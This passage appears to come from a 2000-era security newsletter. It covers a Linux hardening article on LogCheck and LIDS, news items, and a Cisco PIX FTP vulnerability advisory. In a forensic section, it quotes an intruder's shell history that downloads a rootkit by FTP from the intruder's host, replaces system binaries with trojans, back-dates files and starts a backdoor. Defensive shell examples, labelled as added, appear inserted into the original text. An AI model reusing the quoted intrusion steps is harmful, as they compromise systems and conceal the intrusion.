works by scanning the various system log files (under Linux these are
located in /var/log), and notifying the system administrator by e-mail if
there is any unusual activity. Unusual messages in the log files can
often be generated by intrusion attempts, or actual intrusions against
your system.
Installing LogCheck
LogCheck is available in RPM format from the Red
Hat contrib archives, and from the same sources as PortSentry. Installing
LogCheck from the RPM file or from the source code (read the INSTALL file
provided with the source code) is relatively simple.
Configuring LogCheck
LogCheck has four main configuration files. In
the RPM version, these are stored in the /etc/logcheck directory.
Normally, only the logcheck.ignore and the logcheck.violations.ignore
files need modification. The normal process that I go through after
installing LogCheck is as follows:
Allow LogCheck to run once with the standard configuration files. This
will produce a large output file, which can be thrown away.
24 hours later, allow LogCheck to run again. This will detect any new
entries in the log files since the last run, and will produce a smaller
but still sizeable output file. Read this file carefully.
For entries in the file that are of no great concern (use your judgement
for this) find a specific identifying string in the entry. For entries
that are in the "Security Violations" section, add the identifying string
to the logcheck.violations.ignore file. For other entries (in the
"Unusual System Events" section), add the string to the logcheck.ignore
file.
Repeat this process, once every 12 - 24 hours for approximately a week.
By this stage, enough "bogus" entries will be filtered out by the strings
that you have added to the .ignore files that the daily LogCheck report
will contain only genuine system concerns.
Note that the RPM file specifies that LogCheck is to be run hourly, but
normally I only run it daily except on critical systems that need regular
monitoring. This is done by moving the /etc/cron.hourly/logcheck file
into /etc/cron.daily.
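The tuning loop above, modelled as an added example (this is not LogCheck's own code): an entry that hits a keyword goes to "Security Violations" unless it contains a string from the violations ignore list, and every other entry goes to "Unusual System Events" unless it contains a string from the ignore list. The keyword list, log lines and function names are constructed, and matching on fixed strings with grep is an assumption made for the sketch.

```sh
#!/bin/sh
# Simplified model of the report tuning loop; all sample data is constructed.

# drop_ignored FILE: copy stdin to stdout minus lines containing any string
# listed in FILE. Blank lines in FILE are skipped, because an empty pattern
# matches every line and would silently empty the report.
drop_ignored() {
    pats=$(grep -v '^[[:space:]]*$' "$1" || true)
    if [ -z "$pats" ]; then
        cat
    else
        grep -v -F -e "$pats" || true
    fi
}

# security_violations LOG KEYWORDS VIOLATIONS_IGNORE
security_violations() {
    grep -i -F -f "$2" "$1" | drop_ignored "$3"
}

# unusual_events LOG KEYWORDS IGNORE
unusual_events() {
    grep -v -i -F -f "$2" "$1" | drop_ignored "$3"
}

# make_sample DIR: write a constructed log, keyword list and empty ignore lists.
make_sample() {
    cat > "$1/messages" <<'EOF'
May  7 02:11:09 www sshd[411]: refused connect from 192.0.2.44
May  7 02:15:31 www named[302]: Cleaned cache of 14 RRs
May  7 03:00:01 www su: (to nobody) root on none
May  7 03:20:47 www kernel: eth0: Promiscuous mode enabled.
May  7 04:02:00 www ftpd[988]: FAILED LOGIN from 192.0.2.9
EOF
    printf '%s\n' 'refused' 'failed' 'su: ' > "$1/keywords"
    : > "$1/violations.ignore"
    : > "$1/ignore"
}

# report DIR: print both report sections for the sample in DIR.
report() {
    echo 'Security Violations'
    security_violations "$1/messages" "$1/keywords" "$1/violations.ignore" | sed 's/^/  /'
    echo 'Unusual System Events'
    unusual_events "$1/messages" "$1/keywords" "$1/ignore" | sed 's/^/  /'
}

demo=$(mktemp -d)
make_sample "$demo"
echo '--- first run, empty ignore lists'
report "$demo"
# The administrator judges two entries to be routine and adds one
# identifying string for each to the matching ignore list.
echo '(to nobody) root' >> "$demo/violations.ignore"
echo 'Cleaned cache of' >> "$demo/ignore"
echo '--- next run, after tuning'
report "$demo"
rm -rf "$demo"
```

Pick identifying strings that are as narrow as possible: a short string such as "root" would also hide entries that deserve attention.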
Kernel Based Intrusion Detection
Kernel based intrusion detection is
a relatively new art form for Linux. The main kernel based intrusion
detection system currently available is called LIDS, and is available
from http://www.lids.org/.
What is LIDS?
LIDS is an intrusion detection and prevention system
that resides within the Linux kernel.
LIDS' protection is aimed at preventing the root user (who would normally
have access to the entire system) from tampering with important parts of
the system. LIDS' most important features include increased file system
protection, protection against direct port access or direct memory
access, protection against raw disk access, and protection of log files.
LIDS also prevents certain system actions, such as installing a packet
sniffer or changing firewall rules.
LIDS Documentation
The LIDS system is somewhat more complex to
install than either PortSentry or LogCheck. Fortunately, the LIDS web
site contains quite good documentation on the LIDS project, including
installation and configuration instructions.
Installing LIDS
First, before installing LIDS, make sure that you
have the most up to date LIDS patch (I am using 0.9), and the correct
kernel version. I am using the updated kernel (2.2.14-12) from the Red
Hat Updates FTP site, because this contains some security fixes. You also
need the source code for the kernel that you are using.
LIDS is currently targeted towards the 2.2.14 kernels. I installed LIDS
on a Red Hat 6.2 system, this includes the 2.2.14 kernel. Before I
installed LIDS, I obtained the updated kernel (from
ftp.redhat.com/updates/ or one of its mirrors) and installed it according
to the instructions at
http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html.
The next thing I obtained was the updated kernel source, which also came
from ftp.redhat.com/updates/ This I installed using:
rpm -Uhv kernel-source-2.2.14-12.i386.rpm
Next, compile and install the lidsadm program:
cd /usr/local/src/security/lids-0.9/lidsadm-0.9
make
make install
Generate a RipeMD-160 password that will later be installed into the
kernel:
lidsadm -P
I entered the password "anypass" and got back the key
"d502d92bfead11d1ef17887c9db07a78108859e8".
Next, I copied the standard Red Hat configuration file for my
architecture into the /usr/src/linux directory:
cd /usr/src/linux/configs/
cp kernel-2.2.12-i686.config ..
Next, I installed the LIDS patch using the following commands:
cd /usr/src
patch -p0 </usr/local/src/security/lids-0.9/lids-0.9-2.2.14-redhat.patch
Note that the Red Hat supplied kernel is slightly different from the
standard 2.2.14 kernel distributed by Linus, as it contains some updated
drivers. The lids-0.9-2.2.14-redhat.patch file that is available is
slightly different to the standard lids-0.9-2.2.14.patch file distributed
with LIDS, as the latter will not apply cleanly to Red Hat's kernel.
Finally, I configured, compiled, and installed the kernel:
cd /usr/src/linux
make menuconfig
make dep; make clean
make install; make modules; make modules_install
The following script shows the LIDS configuration options that I chose
during the kernel configuration:
[*] Linux Intrusion Detection System support (EXPERIMENTAL)
--- LIDS features
[ ] Hang up console when raising a securit alert
[*] Security alert when execing unprotected programs before sealing
[ ] Do not execute unprotected programs before sealing LIDS
[*] Enable init children lock feature
[*] Try not to flood logs
(60) Authorised time between two identic logs (seconds)
[*] Allow switching LIDS protections
RipeMD-160 encrypted password: d502d92bfead11d1ef17887c9db07a78108859e8
(3) Number of attempts to submit password
(3) Time to wait after a fail (seconds)
[*] Allow remote users to switch LIDS protections
[ ] Allow any program to switch LIDS protections
[*] Allow reloading config. file
[ ] Hide some known processes
[*] Port Scanner Detector in kernel
[ ] Send security alerts through network
--- Special authorizations
[ ] Allow some known processes to access /dev/mem (xfree, etc.)
[ ] Allow some known processes to access raw disk devices
[ ] Allow some known processes to access io ports
[ ] Allow some known processes to change routes
--- Special UPS
[*] Allow some known processes to unmount devices
Allowed processes: "/etc/rc.d/init.d/halt;/etc/rc.d/init.d/netfs"
[*] Unmounting capability is inherited
[*] Allow some known processes to kill init children
Allowed processes: "/etc/rc.d/init.d/halt"
[*] Killing capability is inherited
Note that since I don't have a UPS, am running a headless server (no X
installed), and need to access this system remotely, I chose the
configuration options above. The options that you choose for your
environment may vary.
Configuring LIDS
One important note: After compiling the kernel you
must configure LIDS before you next reboot!
LIDS stores its configuration in the /etc/lids.conf file. This file
should never be edited by hand, instead, you should configure LIDS by
using the lidsadm program.
Running "lidsadm -h" gives a page or so of help as to how to use the
lidsadm program. The LIDS documentation (on the LIDS web site) gives some
examples of using LIDS to protect files, for example:
lidsadm -A -r /sbin
... which protects (marks read-only) the entire /sbin directory.
My preferred LIDS configuration script looks like this:
lidsadm -Z
lidsadm -A -r /usr/bin
lidsadm -A -r /bin
lidsadm -A -r /usr/sbin
lidsadm -A -r /sbin
lidsadm -A -r /usr/X11R6/bin
lidsadm -A -r /etc/rc.d
lidsadm -A -r /etc/sysconfig
Once the LIDS system has been configured, you need to update your boot
scripts to ensure that the "lidsadm -I" command is run during the boot
process. This effectively "starts" the LIDS functions in the kernel. I
normally place lidsadm at the end of the /etc/rc.d/rc.local script, as
this ensures that the LIDS functionality doesn't prevent the rest of the
system scripts from operating correctly.
This is the command line that I use at the end of /etc/rc.d/rc.local to
start LIDS:
/sbin/lidsadm -I -- -CAP_SYS_MODULE -CAP_SYS_RAWIO -CAP_SYS_ADMIN \
-CAP_SYS_PTRACE -CAP_NET_ADMIN -CAP_LINUX_IMMUTABLE \
+INIT_CHILDREN_LOCK
Configuring LILO
Note that since the Kernel was updated using Red
Hat's RPMs, you will need to follow the instructions in the Red Hat
kernel upgrading web page mentioned above to modify the /etc/lilo.conf
file. This will ensure that the new kernel that has been compiled with
LIDS functionality will be the one booted when your system reboots.
After Reboot
After the next reboot, LIDS will be running on your
system. If you need to stop LIDS to perform system administration tasks,
then you should use one of the following commands:
/sbin/lidsadm -S -- -LIDS
or
/sbin/lidsadm -S -- -LIDS_GLOBAL
You will need to provide the LIDS password, which was inserted into the
kernel in RipeMD-160 format during the kernel compile.
You will also note that on shutdown, most of the shutdown scripts will
fail. This is normal. The final shutdown script (/etc/rc.d/init.d/halt)
will kill all of the processes and unmount the file systems. No other
process will be allowed to kill any of the children of the init()
process, due to the "+INIT_CHILDREN_LOCK" protection made in the rc.local
file (above).
Also, every 10 minutes, you will get an error message about "rmmod -as"
being unable to remove a module. This is because the "-CAP_SYS_MODULE"
protection stops insertion or removal of modules once LIDS has started.
To stop the error message happening, delete the /etc/cron.d/kmod file.
What Can LIDS Protect?
A quick read through the LIDS documentation
will reveal the full set of features in LIDS. The most important
features, in my opinion, include the following:
CAP_LINUX_IMMUTABLE, which protects the files and file systems from being
written to when marked "immutable".
CAP_NET_ADMIN, which prevents tampering with the network configuration
(eg: prevents route table entries from being changed, and prevents
firewall entries from being tampered with).
CAP_SYS_MODULE which prevents insertion and removal of kernel modules.
CAP_SYS_RAWIO which prevents raw disk/device I/O.
CAP_SYS_ADMIN which prevents a large range of other system administration
functions.
INIT_CHILDREN_LOCK which prevents child processes of the init() master
process from being tampered with.
All of the above features can be turned on at any point using "lidsadm
-I". The features can also be disabled at any point (to allow the real
system administrator access to the system configuration) by using
"lidsadm -S", and providing the LIDS password which was installed into
the kernel (and encrypted with RipeMD-160).
Anatomy of a Break In
I was recently asked to examine a system that
had been hacked, to determine the cause of the break-in, and to determine
what damage the hacker had done to the system. Fortunately, the system
was hacked by someone who was not particularly clever, and didn't manage
to conceal their tracks entirely.
The break-in occurred when the hacker overflowed the buffer of a system
daemon running as root (in fact one that should not have been running on
the system at all, but the person who installed Linux was careless and
left it running, and also failed to install Red Hat's released updates
which would have fixed the buffer overflow problem). The hacker, however,
was also careless in that when they managed to open a shell (BASH) on the
hacked system following the break-in, they forgot that the BASH shell
logs all activity to a .bash_history file for use by the command line
recall functions. A simple read through /.bash_history revealed exactly
what the hacker had done while logged on to the system.
The file read as follows (edited slightly for brevity):
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz; mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz; mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/; mv pstree /usr/bin ; /usr/lib/pt07
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd
Reading through this file, we can note the following activity:
A directory with an unusual name (/usr/lib/...) was created on the
system. An FTP connection was made back to the hacker's personal machine
(200.192.58.201, traced to a dial-in address somewhere in Brazil), and a
simple hacker-kit was downloaded.
The hacker kit was uncompressed. It contained trojan binaries which were
then installed on the system.
The trojan binaries were used to over-write the system versions of
netstat, ps, tcpd, syslogd, and pstree. These are programs that get used
to report on system activity, show running processes, show open ports,
etc.
A backdoor process of some kind (/usr/lib/pt07) was installed and
started. Note that since the hacker has installed his or her own versions
of ps, pstree, and netstat, this trojan is probably invisible to the
system.
What Can We Learn From This?
Firstly, note that LIDS would not have
prevented the actual break-in. The hacker obtained root access to the
machine by connecting to and overflowing a buffer in a process that was
running as root.
Once the hacker had broken in, we can note how LIDS would have minimised
the damage:
LIDS, by using the CAP_LINUX_IMMUTABLE option, would have prevented the
trojan binaries from being written to /bin, /usr/bin, /usr/sbin, and
/usr/lib. These are directories that we would normally mark as immutable
(chattr +i) and hence could not have been changed. Note that even without
LIDS we can mark these directories as immutable using chattr +i, but LIDS
prevents even the root user from tampering with the immutable flag.
Similarly, the touch -t commands would have failed if the files were
marked chattr +i.
Even the very first line of the script, "mkdir /usr/lib/..." would have
failed if the /usr/lib directory was marked immutable!
Note that LIDS would not have prevented the break-in, but would have
prevented the hacker from causing any significant system damage after the
break-in. A backdoor process could have been installed (eg: the pt07
backdoor could have been placed in /tmp, or any other non-immutable
directory), but the non-trojan versions of ps, netstat, and pstree would
have detected this process fairly easily and we could have come back and
killed it off.
Without LIDS being installed we have no other real clues as to what the
hacker might have done via this backdoor, and so our only available
method to clean up the hacker's damage is to re-install the system
completely.
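A triage check for the traces left by the session above, as an added example that is not part of the original article: touch -t rewrites a file's modification time but not its inode change time, so a replaced binary shows an old mtime together with a recent ctime, and the kit's staging directory has a name that begins with two dots. The function names, the day threshold and the sample tree are assumptions made for the example.

```sh
#!/bin/sh
# Triage helpers for the traces described above. Run them from trusted
# media: on a compromised host the local find binary may itself be replaced.

# backdated_files DAYS DIR...: regular files whose mtime claims they are
# older than DAYS days while their inode changed within the last DAYS days.
# touch -t sets mtime, but the kernel stamps ctime with the current time.
backdated_files() {
    days=$1; shift
    find "$@" -type f -mtime +"$days" -ctime -"$days" -print 2>/dev/null || true
}

# dot_named_dirs DIR...: directories whose names start with two dots and
# have at least one more character ("...", ".. ", "..x"); they are easy to
# overlook next to "." and ".." in a directory listing.
dot_named_dirs() {
    find "$@" -type d -name '..?*' -print 2>/dev/null || true
}

# triage DAYS DIR...: one tagged line per finding.
triage() {
    days=$1; shift
    backdated_files "$days" "$@" | sed 's/^/BACKDATED /'
    dot_named_dirs "$@" | sed 's/^/DOTDIR    /'
}

# make_sample_tree DIR: constructed stand-in for the affected directories.
make_sample_tree() {
    mkdir -p "$1/bin" "$1/usr/lib/..."
    echo 'stand-in for a replaced binary' > "$1/bin/ps"
    echo 'stand-in for a file written today and not back-dated' > "$1/bin/ls"
    # Same back-dating as in the history file; ctime stays at "now".
    touch -t 199910122110 "$1/bin/ps"
}

demo=$(mktemp -d)
make_sample_tree "$demo"
triage 7 "$demo"
rm -rf "$demo"
```

Package installs and upgrades also leave an old mtime with a fresh ctime, so choose a threshold shorter than the time since the last legitimate update and compare any hits against the package database.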
OpenWall and LIDS: An Extra Layer
Another similar system to LIDS is
the OpenWall project (http://www.openwall.com/linux/). The OpenWall
project contains some different security features to LIDS, and one of the
OpenWall patches in particular makes the stack area non-executable. An
excerpt from the OpenWall README file states:
Most buffer overflow exploits are based on overwriting a function's
return address on the stack to point to some arbitrary code, which is
also put onto the stack. If the stack area is non-executable, buffer
overflow vulnerabilities become harder to exploit.
Another way to exploit a buffer overflow is to point the return address
to a function in libc, usually system(). This patch also changes the
default address that shared libraries are mmap()'ed at to make it always
contain a zero byte. This makes it impossible to specify any more data
(parameters to the function, or more copies of the return address when
filling with a pattern), -- in many exploits that have to do with ASCIIZ
strings.
Recently, the LIDS web site has contained some integrated LIDS + OpenWall
kernel patches that apply the security features of both LIDS and OpenWall
to the kernel in a single integrated patch set.
Conclusions
Using a set of layered security tools on the Linux
system, it is possible to prevent a wide range of system attacks, and to
protect your system against intrusion or tampering. A hacker's point of
entry into your system will be the network interfaces, and protecting these,
and under the network interfaces, the system kernel, can discourage many
attacks and prevent others.
Be aware of any potential security holes in your system. Any daemon or service
running on your system, either as root or as a non-root user, can be a potential
security threat. Be prepared to face attacks against these threats.
@HWA
204.0 [HNS] May 24:CRACKED! PART 3: HUNTING THE HUNTER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 24 May 2000 on 12:51 AM
Noel continues the story of when some Unix boxes that he helped admin
were cracked. This article talks about some of the efforts made to
track down the cracker and some surprises.
Link: RootPrompt.org
http://rootprompt.org/article.php3?article
Url is b0rked
You have an error in your SQL syntax near ';' at line 1
Warning: 0 is not a MySQL result index in /usr/www/users/noeld/article.php3 on line 53
@HWA
205.0 [HNS] May 24: THE NEXT GENERATION OF ILOVEYOU:THE PORN WORM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by LogError
Wednesday 24 May 2000 on 12:45 AM
Erik Green writes "I've been sent a new semi-benign ILOVEYOU variant -
it's got a subject line of "Check this" and consists of a one-line
message and an attachment named LINKS.VBS. Its only purpose other than
self replication is to add a link to a XXX site to your desktop...
Link: Slashdot
http://slashdot.org/article.pl?sid
@HWA
206.0 [HNS] May 23:PAPERS SENT TO PROSECUTORS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 23 May 2000 on 4:27 PM
Japan had a first case in which papers have been sent to prosecutors
on a minor suspected of "hacking" (article writes about hacking, but
it looks like it was just password stealing) since a law banning illegal
computer access went into effect in February.
Link: Daily Yomiuri
http://www.yomiuri.co.jp/newse/0523cr11.htm
@HWA
207.0 [HNS] May 23:INFOEXPRESS AND NETWORK UTIL. AGREEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 23 May 2000 on 4:14 PM
InfoExpress, Inc., today announced an exclusive distribution agreement
with U.K.-based Network Utilities (Systems) Ltd., a leading
distributor of best-in-class enterprise security. The agreement names
Network Utilities the sole provider of InfoExpress' marketing and
technical support in the U.K. market.
Link: Press release
http://www.net-security.org/cgi-bin/press/fullnews.cgi?newsid959090959,5116,
@HWA
208.0 [HNS] May 23:FREE EXPORT OF ENCRYPTION SOFTWARE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 23 May 2000 on 3:13 AM
The European ministers of Foreign Affairs are expected to decide
Monday to lift all barriers to the export of encryption software to
countries outside the European Union.
Link: Heise
http://www.heise.de/tp/english/inhalt/te/8179/1.html
@HWA
209.0 [HNS] May 23:NAI GAUNTLET FIREWALL VULNERABILITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Tuesday 23 May 2000 on 3:05 AM
According to Security Focus a firewall package protecting thousands of
networks worldwide contains a bug that would allow attackers to obtain
"root" access remotely.
Link: Security Focus
http://www.securityfocus.com/news/40
@HWA
210.0 [HNS] May 22: CISCO SECURE PIX FIREWALL PROBLEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Monday 22 May 2000 on 10:07 PM
The Cisco Secure PIX Firewall interprets FTP (File Transfer Protocol)
commands out of context and inappropriately opens temporary access
through the firewall.
Link: Cisco
http://www.cisco.com/warp/public/707/pixftp-pub.shtml
Cisco Secure PIX Firewall FTP Vulnerabilities
Revision 1.6
For public release 2000 March 16 05:00 PM US/Pacific (UTC+0800)
Summary
The Cisco Secure PIX Firewall interprets FTP (File Transfer
Protocol) commands out of context and inappropriately opens temporary
access through the firewall. This is an interim notice describing two
related vulnerabilities. The first vulnerability is exercised when the
firewall receives an error message from an internal FTP server containing
an encapsulated command such that the firewall interprets it as a distinct
command. This vulnerability can be exploited to open a separate
connection through the firewall. This vulnerability is documented as
Cisco Bug ID CSCdp86352.
The second vulnerability is exercised when a client inside the firewall
browses to an external server and selects a link that the firewall
interprets as two or more FTP commands. The client begins an FTP
connection as expected and at the same time unexpectedly executes another
command opening a separate connection through the firewall. This
vulnerability is documented as Cisco Bug ID CSCdr09226.
Either vulnerability can be exploited to transmit information through the
firewall without authorization.
Both vulnerabilities are addressed more completely in this updated interim
security advisory.
Who Is Affected
All users of Cisco Secure PIX Firewalls with
software versions up to and including 4.2(5), 4.4(4), and 5.0(3) that
provide access to FTP services are at risk from both vulnerabilities.
Cisco Secure PIX Firewall with software version 5.1(1) is affected by the
second vulnerability only.
Cisco Secure Integrated Software (formerly Cisco IOS® Software Firewall
Feature Set) is not affected by either vulnerability.
Impact
Any Cisco Secure PIX Firewall that has enabled the fixup
protocol ftp command is at risk of unauthorized transmission of data
through the firewall.
Details
The first vulnerability has been assigned
Cisco bug ID CSCdp86352. The second vulnerability has been assigned Cisco
bug ID CSCdr09226. The behavior is due to the command fixup protocol ftp
[portnum], which is enabled by default on the Cisco Secure PIX Firewall.
If you do not have protected FTP hosts with the accompanying configuration
(configuration example below) you are not vulnerable to the attack which
causes a server to send a valid command, encapsulated within an error
message, and causes the firewall to read the encapsulated partial command
as a valid command (CSCdp86352).
To exploit this vulnerability, attackers must be able to make connections
to an FTP server protected by the PIX Firewall. If your Cisco Secure PIX
Firewall has configuration lines similar to the following:
fixup protocol ftp 21
and either
conduit permit tcp host 192.168.0.1 eq 21 any
or
conduit permit tcp 192.168.0.1 255.255.255.0 eq 21 any
It is possible to fool the PIX stateful inspection into opening up
arbitrary TCP ports, which could allow attackers to circumvent defined
security policies.
If you permit internal clients to make arbitrary FTP connections
outbound, you may be vulnerable to the second vulnerability
(CSCdr09226). This is an attack based on CERT advisory CA-2000-02:
Malicious HTML Tags Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html and detailed in the
BUGTRAQ post: "Extending the FTP 'ALG' vulnerability to any FTP client"
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-08&msg=38C8C8EE.544524B1@enternet.se
The recommendation in the workarounds section of this document will
provide protection against this vulnerability.
Response for the first vulnerability (CSCdp86352)
The following changes have been made to the "fixup protocol FTP"
behavior of the PIX Firewall:
Enforce that only the server can generate a reply indicating the PASV command was accepted.
Enforce that only the client can generate a PORT command.
Enforce that data channel is initiated from the expected side in an FTP transaction.
Verify that the "227" reply code and the PORT command are complete commands and not part of a "500" error code string broken into fragments.
Enforce that the port is not 0 or in the range between [1,1024]
These or equivalent changes will be carried forward into all PIX
Firewall software versions after version 5.1(1).
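The sender, completeness and port-range checks from the list above, sketched as an added example (this is not Cisco's implementation): a per-line inspector that decides whether an FTP control-channel line may open a data connection. The function names, verdict strings and sample lines are constructed, and the sketch assumes TCP segments have already been reassembled into complete lines before a line is inspected.

```sh
#!/bin/sh
# Sketch of the control-channel checks listed above; names are hypothetical.
# Commands are matched in upper case only to keep the sketch short; anything
# not recognised never opens a data channel, so it fails closed.

# data_port "h1,h2,h3,h4,p1,p2": print the TCP port, or fail if malformed.
data_port() {
    case $1 in ''|*[!0-9,]*|*,) return 1 ;; esac
    old_ifs=$IFS; IFS=,
    set -- $1
    IFS=$old_ifs
    [ $# -eq 6 ] || return 1
    for n in "$@"; do
        case $n in ''|0?*) return 1 ;; esac       # empty field or leading zero
        [ ${#n} -le 3 ] && [ "$n" -le 255 ] || return 1
    done
    echo $(( $5 * 256 + $6 ))
}

# inspect_line SENDER LINE: SENDER is "client" or "server"; LINE is one
# complete line without its CRLF. Prints "open <port>", "pass" (no data
# channel involved) or "deny <reason>".
inspect_line() {
    sender=$1
    line=$2
    case $line in
        'PORT '*)
            [ "$sender" = client ] || { echo 'deny PORT not from client'; return 0; }
            spec=${line#PORT }
            ;;
        '227 '*)
            [ "$sender" = server ] || { echo 'deny 227 not from server'; return 0; }
            case $line in
                *'('*')'*) ;;
                *) echo 'deny incomplete 227 reply'; return 0 ;;
            esac
            spec=${line#*\(}
            spec=${spec%%\)*}
            ;;
        *)
            # Any other line, including a "500 ..." error that merely quotes
            # PORT or 227 text, is not a data-channel command.
            echo pass
            return 0
            ;;
    esac
    port=$(data_port "$spec") || { echo 'deny malformed address'; return 0; }
    if [ "$port" -le 1024 ]; then                 # covers 0 and [1,1024]
        echo "deny port $port not allowed"
    else
        echo "open $port"
    fi
}

# Constructed sample lines: sender|line
while IFS='|' read -r who text; do
    printf '%-6s %-52s -> %s\n' "$who" "$text" "$(inspect_line "$who" "$text")"
done <<'EOF'
client|PORT 192,168,0,1,19,136
server|227 Entering Passive Mode (192,168,0,1,4,1)
server|227 Entering Passive Mode (192,168,0,1,0,23)
server|PORT 192,168,0,1,19,136
server|500 Invalid command given: 227 (192,168,0,1,19,136)
EOF
```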
Response for the second vulnerability (CSCdr09226)
We have added an additional command keyword to address this problem:
fixup protocol ftp [strict] <port1>[-<port2>]
The "strict" keyword directs the fixup protocol ftp command to maintain
strict command state, and may impact some FTP features such as command
pipelining or command grouping. This will be fixed in version 5.1(2) and
subsequent versions, as well as in version 4.4(5).
Software Versions and Fixes
Getting Fixed Software
Cisco is offering free software upgrades to remedy this vulnerability
for all affected customers. Customers with service contracts may upgrade
to any software version. Customers without contracts may upgrade only
within a single row of the table below, except that any available fixed
software will be provided to any customer who can use it and for whom the
standard fixed software is not yet available. As always, customers may
install only the feature sets they have purchased.
Version Affected | Interim Release** (fix will carry forward into all later versions) Available Now through the TAC | Projected first fixed regular release (fix will carry forward into all later versions)
All versions of Cisco Secure PIX up to version 4.2(5) (including 2.7, 3.0, 3.1, 4.0, 4.1) | 4.2(5)205** | 4.2(6) Currently not scheduled.*
All 4.3.x and 4.4.x up to and including version 4.4(4) | 4.4(4)202** | 4.4(5) Estimated date available: 2000 May 30*
All 5.0.x up to and including version 5.0(1) | 5.0(3)202** | 5.0(4) Estimated date available: On hold
Version 5.1(1) - not affected by CSCdp86352 | 5.1(1)207** | 5.1(2) Estimated date available: 2000 June 9*
* All dates are tentative and subject to change
** Interim releases are subjected to less internal testing and
verification than are regular releases, may have serious bugs, and
should be installed with great care.
Schedules have been updated to include released versions that fix both
vulnerabilities addressed by this interim security advisory.
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained via the Software Center on Cisco's Worldwide Web site
at http://www.cisco.com/.
Customers without contracts should get their upgrades by contacting the
Cisco Technical Assistance Center (TAC). TAC contacts are as follows:
+1 800 553 2447 (toll-free from within North America)
+1 408 526 7209 (toll call from anywhere in the world)
e-mail: tac@cisco.com
Give the URL of this notice as evidence of your entitlement to a free
upgrade. Free upgrades for non-contract customers must be requested
through the TAC.
Please do not contact either "psirt@cisco.com" or
"security-alert@cisco.com" for software upgrades.
Hardware requirements
If version 4.3 or 4.4 is utilized on a PIX
'Classic' (excludes PIX10000, PIX-510, PIX-520, and PIX-515) or
If version 5.0 is utilized on a PIX 'Classic', PIX10000, or PIX-510
(excludes PIX-520 and PIX-515)
A 128MB upgrade for the PIX Firewall is necessary. As with any new
software installation, customers planning to upgrade should carefully read
the release notes and other relevant documentation before beginning any
upgrade. Also, it is important to be certain that the new version of Cisco
Secure PIX Firewall software is supported by your hardware, and especially
that enough memory is available.
Workarounds
The behaviors described in this document are a result of
the default command fixup protocol ftp [portnum]. To disable this
functionality, enter the command no fixup protocol ftp. This will disable
support of the fixup of the FTP protocol in the PIX, and will eliminate
the vulnerabilities. The command fixup protocol ftp 21 is the default
setting of this feature, and is enabled by default on the Cisco Secure PIX
Firewall. This workaround will force your clients to use FTP in passive
mode, and inbound FTP service will not be supported. Outbound standard
FTP will not work without fixup protocol ftp 21, however, passive FTP will
function correctly with no fixup protocol ftp configured.
Exploitation and Public Announcements
This vulnerability was proposed on
the BUGTRAQ list, and in follow-ups to the article, the Cisco Secure PIX
Firewall was also identified as susceptible. As the vulnerabilities have
been widely discussed, Cisco is posting this advisory prior to having a
full fix. We will update this notice again, when we have a full fix
available. Cisco has had no reports of malicious exploitation of this
vulnerability. However, versions of exploit scripts have been posted to
various security related lists.
This vulnerability was reported to Cisco via several sources, shortly
after the time of the original supposition.
Status of This Notice: INTERIM
This is an interim field notice. Although Cisco cannot guarantee the
accuracy of all statements in this notice, all the facts have been checked
to the best of our ability. Cisco anticipates issuing updated versions of
this notice within four weeks (by June 26, 2000).
Distribution
This notice will be posted on Cisco's Worldwide Web site at
http://www.cisco.com/warp/public/707/pixftp-pub.shtml. In addition to
Worldwide Web posting, the initial version of this notice is being sent to
the following e-mail and Usenet news recipients:
- cust-security-announce@cisco.com
- bugtraq@securityfocus.com
- first-teams@first.org (includes CERT/CC)
- cisco@spot.colorado.edu
- comp.dcom.sys.cisco
- firewalls@lists.gnac.com
- Various internal Cisco mailing lists
Future updates of this notice, if any, will be placed on Cisco's Worldwide
Web server, but may or may not be actively announced on mailing lists or
newsgroups. Users concerned about this problem are encouraged to check the
URL given above for any updates.
Revision History
- Revision 1.0 2000 March 16 08:00 AM US/Pacific (UTC+0800) - Initial
  public release
- Revision 1.1 2000 March 16 08:00 AM US/Pacific (UTC+0800) - Link
  corrections, table head clarification.
- Revision 1.3 2000 March 16 14:00 PM US/Pacific (UTC+0800) - Addition of
  2nd vulnerability issues.
- Revision 1.4 2000 April 4 12:00 PM US/Pacific (UTC+0800) - Changes to
  dates for fixed software and Status of This Notice section.
- Revision 1.5 2000 April 28 5:30 PM US/Pacific (UTC+0800) - Changes to
  Summary, Response for the second vulnerability (CSCdr09226), Software
  Versions and Fixes, and Status of This Notice sections.
- Revision 1.6 2000 May 19 10:45 AM US/Pacific (UTC+0800) - Changes to
  date in Status of This Notice INTERIM section, and date change in the
  Software Version and Fixes section.
Cisco Security Procedures
Complete information on reporting security
vulnerabilities in Cisco products, obtaining assistance with security
incidents, and registering to receive security information from Cisco, is
available on Cisco's Worldwide Web site at
